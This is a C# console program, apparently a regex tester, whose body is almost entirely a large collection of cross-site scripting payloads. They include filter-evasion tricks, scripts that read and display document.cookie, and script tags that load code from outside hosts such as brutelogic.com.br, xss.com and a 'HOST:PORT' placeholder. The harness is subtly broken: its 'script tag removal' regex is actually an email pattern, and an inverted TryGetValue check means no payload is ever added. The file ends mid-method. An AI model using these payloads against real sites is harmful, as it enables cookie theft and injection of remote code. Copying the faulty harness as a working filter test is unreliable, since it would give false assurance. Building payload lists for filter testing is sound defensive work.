using RegexTester.Interfaces;
using RegexTester.Entities;
using RegexTester.Enum;
using System;
using System.Collections.Generic;
using System.Text.RegularExpressions;
using System.Linq;

namespace RegexTester
{
    class Program
    {
        public static Regex removeScriptTagAndIdNameAttributesRegEx = new Regex(@"^([a-zA-Z0-9_\-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{2,4})(\]?)$", RegexOptions.IgnoreCase | RegexOptions.Singleline);
        public static IPayloadContainer PayloadContainer {get;set;}

        static void Main(string[] args)
        {
            PayloadContainer = new PayloadContainer()
            {
                Payloads = new Dictionary<TypesToValidate, IList<IPayload>>()
            };
            PayloadContainer.Payloads.Add(TypesToValidate.XSS, new List<IPayload>());
            SetupPayloads();
            TestPayloads();
            Console.ReadKey();
        }

        public static void TestPayloads()
        {
            foreach(KeyValuePair<TypesToValidate, IList<IPayload>> items in PayloadContainer.Payloads)
            {
                foreach(var item in items.Value)
                {
                    ReplaceRegex(item.Payload);
                }
            }
        }

        public static void SetupPayloads()
        {
            IList<IPayload> payloads;
            if(!PayloadContainer.Payloads.TryGetValue(TypesToValidate.XSS, out payloads))
            {
                payloads.Add(new XSSPayload() { Payload = "javascript://'/</title></style></textarea></script>--><p' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "javascript://--></script></title></style>'/</textarea>*/<alert()/*' onclick=alert()//>a"});
                payloads.Add(new XSSPayload() { Payload = "javascript://</title>'/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/"});
                payloads.Add(new XSSPayload() { Payload = "javascript://</title></style></textarea>--></script><a'//' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "javascript://'//' --></textarea></style></script></title><b onclick= alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "javascript://</title></textarea></style></script --><li '//' '*/alert()/*', onclick=alert()//"});
                payloads.Add(new XSSPayload() { Payload = "javascript:alert()//--></script></textarea></style></title><a'//' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "--></script></title></style>'/</textarea><a' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "/</title/'/</style/</script/</textarea/--><p' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "javascript://--></title></style></textarea></script><svg '//' onclick=alert()//"});
                payloads.Add(new XSSPayload() { Payload = "/</title/'/</style/</script/--><p' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//--></SCRIPT>'>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>"});
                payloads.Add(new XSSPayload() { Payload = "“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//"});
                payloads.Add(new XSSPayload() { Payload = "''>><marquee><img src=x onerror=confirm(1)></marquee>'></plaintext\\></|\\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->'></script><script>alert(1)</script>'><img/id='confirm&lpar;1)'/alt='/'src='/'onerror=eval(id&%23x29;>''><img src='http://i.imgur.com/P8mL8.jpg'>"});
                payloads.Add(new XSSPayload() { Payload = "javascript://'/</title></style></textarea></script>--><p' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "javascript://--></script></title></style>'/</textarea>*/<alert()/*' onclick=alert()//>a"});
                payloads.Add(new XSSPayload() { Payload = "javascript://</title>'/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/"});
                payloads.Add(new XSSPayload() { Payload = "javascript://</title></style></textarea>--></script><a'//' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "javascript://'//' --></textarea></style></script></title><b onclick= alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "javascript://</title></textarea></style></script --><li '//' '*/alert()/*', onclick=alert()//"});
                payloads.Add(new XSSPayload() { Payload = "javascript:alert()//--></script></textarea></style></title><a'//' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "--></script></title></style>'/</textarea><a' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "/</title/'/</style/</script/</textarea/--><p' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "javascript://--></title></style></textarea></script><svg '//' onclick=alert()//"});
                payloads.Add(new XSSPayload() { Payload = "/</title/'/</style/</script/--><p' onclick=alert()//>*/alert()/*"});
                payloads.Add(new XSSPayload() { Payload = "jaVasCript:/*-/*`/*\\`/*'/*'/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"});
                payloads.Add(new XSSPayload() { Payload = "alert`1`"});
                payloads.Add(new XSSPayload() { Payload = "alert&lpar;1&rpar;"});
                payloads.Add(new XSSPayload() { Payload = "alert&#x28;1&#x29"});
                payloads.Add(new XSSPayload() { Payload = "alert&#40;1&#41"});
                payloads.Add(new XSSPayload() { Payload = "(alert)(1)"});
                payloads.Add(new XSSPayload() { Payload = "a=alert,a(1)"});
                payloads.Add(new XSSPayload() { Payload = "[1].find(alert)"});
                payloads.Add(new XSSPayload() { Payload = "top['al'+'ert'](1)"});
                payloads.Add(new XSSPayload() { Payload = "top[/al/.source+/ert/.source](1)"});
                payloads.Add(new XSSPayload() { Payload = "al\u0065rt(1)"});
                payloads.Add(new XSSPayload() { Payload = "top['al\\145rt'](1)"});
                payloads.Add(new XSSPayload() { Payload = "top['al\x65rt'](1)"});
                payloads.Add(new XSSPayload() { Payload = "top[8680439..toString(30)](1)"});
                payloads.Add(new XSSPayload() { Payload = "navigator.vibrate(500)"});
                payloads.Add(new XSSPayload() { Payload = "eval(URL.slice(-8))>#alert(1)"});
                payloads.Add(new XSSPayload() { Payload = "eval(location.hash.slice(1)>#alert(1)"});
                payloads.Add(new XSSPayload() { Payload = "innerHTML=location.hash>#<script>alert(1)</script>"});
                payloads.Add(new XSSPayload() { Payload = "<svg onload=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "'><svg onload=alert(1)//"});
                payloads.Add(new XSSPayload() { Payload = "'onmouseover=alert(1)//"});
                payloads.Add(new XSSPayload() { Payload = "'autofocus/onfocus=alert(1)//"});
                payloads.Add(new XSSPayload() { Payload = "'-alert(1)-'"});
                payloads.Add(new XSSPayload() { Payload = "'-alert(1)//"});
                payloads.Add(new XSSPayload() { Payload = "\'-alert(1)//"});
                payloads.Add(new XSSPayload() { Payload = "</script><svg onload=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<x contenteditable onblur=alert(1)>lose focus! "});
                payloads.Add(new XSSPayload() { Payload = "<x onclick=alert(1)>click this! "});
                payloads.Add(new XSSPayload() { Payload = "<x oncopy=alert(1)>copy this! "});
                payloads.Add(new XSSPayload() { Payload = "<x oncontextmenu=alert(1)>right click this! "});
                payloads.Add(new XSSPayload() { Payload = "<x oncut=alert(1)>copy this! "});
                payloads.Add(new XSSPayload() { Payload = "<x ondblclick=alert(1)>double click this! "});
                payloads.Add(new XSSPayload() { Payload = "<x ondrag=alert(1)>drag this! "});
                payloads.Add(new XSSPayload() { Payload = "<x contenteditable onfocus=alert(1)>focus this! "});
                payloads.Add(new XSSPayload() { Payload = "<x contenteditable oninput=alert(1)>input here! "});
                payloads.Add(new XSSPayload() { Payload = "<x contenteditable onkeydown=alert(1)>press any key! "});
                payloads.Add(new XSSPayload() { Payload = "<x contenteditable onkeypress=alert(1)>press any key! "});
                payloads.Add(new XSSPayload() { Payload = "<x contenteditable onkeyup=alert(1)>press any key! "});
                payloads.Add(new XSSPayload() { Payload = "<x onmousedown=alert(1)>click this! "});
                payloads.Add(new XSSPayload() { Payload = "<x onmousemove=alert(1)>hover this! "});
                payloads.Add(new XSSPayload() { Payload = "<x onmouseout=alert(1)>hover this! "});
                payloads.Add(new XSSPayload() { Payload = "<x onmouseover=alert(1)>hover this! "});
                payloads.Add(new XSSPayload() { Payload = "<x onmouseup=alert(1)>click this! "});
                payloads.Add(new XSSPayload() { Payload = "<x contenteditable onpaste=alert(1)>paste here!"});
                payloads.Add(new XSSPayload() { Payload = "<script>alert(1)// "});
                payloads.Add(new XSSPayload() { Payload = "<script>alert(1)<!–"});
                payloads.Add(new XSSPayload() { Payload = "<script src=//brutelogic.com.br/1.js> "});
                payloads.Add(new XSSPayload() { Payload = "<script src=//3334957647/1>"});
                payloads.Add(new XSSPayload() { Payload = "%3Cx onxxx=alert(1) "});
                payloads.Add(new XSSPayload() { Payload = "<%78 onxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x %6Fnxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x o%6Exxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x on%78xx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x onxxx%3D1"});
                payloads.Add(new XSSPayload() { Payload = "<X onxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x OnXxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<X OnXxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x onxxx=1 onxxx=1"});
                payloads.Add(new XSSPayload() { Payload = "<x/onxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x%09onxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x%0Aonxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x%0Conxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x%0Donxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x%2Fonxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x 1='1'onxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x 1='1'onxxx=1"});
                payloads.Add(new XSSPayload() { Payload = "<x </onxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<x 1='>' onxxx=1 "});
                payloads.Add(new XSSPayload() { Payload = "<http://onxxx%3D1/"});
                payloads.Add(new XSSPayload() { Payload = "<x onxxx=alert(1) 1='"});
                payloads.Add(new XSSPayload() { Payload = "<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>"});
                payloads.Add(new XSSPayload() { Payload = "'onload=alert(1)><svg/1='"});
                payloads.Add(new XSSPayload() { Payload = "'>alert(1)</script><script/1=' "});
                payloads.Add(new XSSPayload() { Payload = "*/alert(1)</script><script>/*"});
                payloads.Add(new XSSPayload() { Payload = "*/alert(1)'>'onload='/*<svg/1='"});
                payloads.Add(new XSSPayload() { Payload = "`-alert(1)'>'onload='`<svg/1='"});
                payloads.Add(new XSSPayload() { Payload = "*/</script>'>alert(1)/*<script/1='"});
                payloads.Add(new XSSPayload() { Payload = "<script>alert(1)</script> "});
                payloads.Add(new XSSPayload() { Payload = "<script src=javascript:alert(1)> "});
                payloads.Add(new XSSPayload() { Payload = "<iframe src=javascript:alert(1)> "});
                payloads.Add(new XSSPayload() { Payload = "<embed src=javascript:alert(1)> "});
                payloads.Add(new XSSPayload() { Payload = "<a href=javascript:alert(1)>click "});
                payloads.Add(new XSSPayload() { Payload = "<math><brute href=javascript:alert(1)>click "});
                payloads.Add(new XSSPayload() { Payload = "<form action=javascript:alert(1)><input type=submit> "});
                payloads.Add(new XSSPayload() { Payload = "<isindex action=javascript:alert(1) type=submit value=click> "});
                payloads.Add(new XSSPayload() { Payload = "<form><button formaction=javascript:alert(1)>click "});
                payloads.Add(new XSSPayload() { Payload = "<form><input formaction=javascript:alert(1) type=submit value=click> "});
                payloads.Add(new XSSPayload() { Payload = "<form><input formaction=javascript:alert(1) type=image value=click> "});
                payloads.Add(new XSSPayload() { Payload = "<form><input formaction=javascript:alert(1) type=image src=SOURCE> "});
                payloads.Add(new XSSPayload() { Payload = "<isindex formaction=javascript:alert(1) type=submit value=click> "});
                payloads.Add(new XSSPayload() { Payload = "<object data=javascript:alert(1)> "});
                payloads.Add(new XSSPayload() { Payload = "<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> "});
                payloads.Add(new XSSPayload() { Payload = "<svg><script xlink:href=data:,alert(1) /> "});
                payloads.Add(new XSSPayload() { Payload = "<math><brute xlink:href=javascript:alert(1)>click "});
                payloads.Add(new XSSPayload() { Payload = "<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>"});
                payloads.Add(new XSSPayload() { Payload = "<html ontouchstart=alert(1)> "});
                payloads.Add(new XSSPayload() { Payload = "<html ontouchend=alert(1)> "});
                payloads.Add(new XSSPayload() { Payload = "<html ontouchmove=alert(1)> "});
                payloads.Add(new XSSPayload() { Payload = "<html ontouchcancel=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<body onorientationchange=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "'><img src=1 onerror=alert(1)>.gif"});
                payloads.Add(new XSSPayload() { Payload = "<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>"});
                payloads.Add(new XSSPayload() { Payload = "GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;"});
                payloads.Add(new XSSPayload() { Payload = "<script src='data:&comma;alert(1)//"});
                payloads.Add(new XSSPayload() { Payload = "'><script src=data:&comma;alert(1)//"});
                payloads.Add(new XSSPayload() { Payload = "<script src='//brutelogic.com.br&sol;1.js&num; "});
                payloads.Add(new XSSPayload() { Payload = "'><script src=//brutelogic.com.br&sol;1.js&num; "});
                payloads.Add(new XSSPayload() { Payload = "<link rel=import href='data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; "});
                payloads.Add(new XSSPayload() { Payload = "'><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;"});
                payloads.Add(new XSSPayload() { Payload = "<base href=//0>"});
                payloads.Add(new XSSPayload() { Payload = "<script/src='data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)"});
                payloads.Add(new XSSPayload() { Payload = "<body onload=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<body onpageshow=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<body onfocus=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<body onhashchange=alert(1)><a href=#x>click this!#x"});
                payloads.Add(new XSSPayload() { Payload = "<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x"});
                payloads.Add(new XSSPayload() { Payload = "<body onscroll=alert(1)><br><br><br><br>"});
                payloads.Add(new XSSPayload() { Payload = "<br><br><br><br><br><br><br><br><br><br>"});
                payloads.Add(new XSSPayload() { Payload = "<br><br><br><br><br><br><br><br><br><br>"});
                payloads.Add(new XSSPayload() { Payload = "<br><br><br><br><br><br><x id=x>#x"});
                payloads.Add(new XSSPayload() { Payload = "<body onresize=alert(1)>press F12!"});
                payloads.Add(new XSSPayload() { Payload = "<body onhelp=alert(1)>press F1! (MSIE)"});
                payloads.Add(new XSSPayload() { Payload = "<marquee onstart=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<marquee loop=1 width=0 onfinish=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<audio src onloadstart=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<video onloadstart=alert(1)><source>"});
                payloads.Add(new XSSPayload() { Payload = "<input autofocus onblur=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<keygen autofocus onfocus=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<form onsubmit=alert(1)><input type=submit>"});
                payloads.Add(new XSSPayload() { Payload = "<select onchange=alert(1)><option>1<option>2"});
                payloads.Add(new XSSPayload() { Payload = "<menu id=x contextmenu=x onshow=alert(1)>right click me!"});
                payloads.Add(new XSSPayload() { Payload = "'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E"});
                payloads.Add(new XSSPayload() { Payload = "<<scr\0ipt/src=http://xss.com/xss.js></script"});
                payloads.Add(new XSSPayload() { Payload = "%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E"});
                payloads.Add(new XSSPayload() { Payload = "' onmouseover=alert(/Black.Spook/)"});
                payloads.Add(new XSSPayload() { Payload = "'><iframe%20src='http://google.com'%%203E"});
                payloads.Add(new XSSPayload() { Payload = "'<script>window.onload=function(){document.forms[0].message.value='1';}</script>"});
                payloads.Add(new XSSPayload() { Payload = "x”</title><img src%3dx onerror%3dalert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>"});
                payloads.Add(new XSSPayload() { Payload = "<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>"});
                payloads.Add(new XSSPayload() { Payload = "<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22);  xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{   var c;   if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) )    alert(c[1]); }catch(e){} };  xdr.send(); </script>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() {    return document.cookie }}); alert(Safe.get());</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>alert(document.head.innerHTML.substr(146,20));</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>alert(document.head.childNodes[3].text)</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%22)};document.body.appendChild(x);</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\\/script>%22)};document.body.appendChild(x);</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>"});
                payloads.Add(new XSSPayload() { Payload = "<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>"});
                payloads.Add(new XSSPayload() { Payload = "<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click';  document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>  (function (o) {   function exploit(x) {    if (x !== null)     alert('User cookie is ' %2B x);    else     console.log('fail');   }      o.onclick = function (e) {    e.__defineGetter__('isTrusted', function () { return true; });    exploit(Safe.get());   };      var e = document.createEvent('MouseEvent');   e.initEvent('click', true, true);   o.dispatchEvent(e);  })(document.getElementById('safe123')); </script>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe src=/ onload=eval(unescape(this.name.replace(/\\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "<script>     function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> "});
                payloads.Add(new XSSPayload() { Payload = "<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #"});
                payloads.Add(new XSSPayload() { Payload = "<script>  function foo(elem, doc, text) {   elem.onclick = function (e) {    e.__defineGetter__(text[0], function () { return true })    alert(Safe.get());   };      var event = doc.createEvent(text[1]);   event.initEvent(text[2], true, true);   elem.dispatchEvent(event);  } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # "});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#"});
                payloads.Add(new XSSPayload() { Payload = "<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#"});
                payloads.Add(new XSSPayload() { Payload = "<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23"});
                payloads.Add(new XSSPayload() { Payload = "<script for=document event=onreadystatechange>getElementById('safe123').click()</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>"});
                payloads.Add(new XSSPayload() { Payload = "<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#"});
                payloads.Add(new XSSPayload() { Payload = "<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();"});
                payloads.Add(new XSSPayload() { Payload = "<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>"});
                payloads.Add(new XSSPayload() { Payload = "<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\\/script%26gt;\\%26quot;%26quot;) autofocus></textarea>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();"});
                payloads.Add(new XSSPayload() { Payload = "<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();"});
                payloads.Add(new XSSPayload() { Payload = "<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>"});
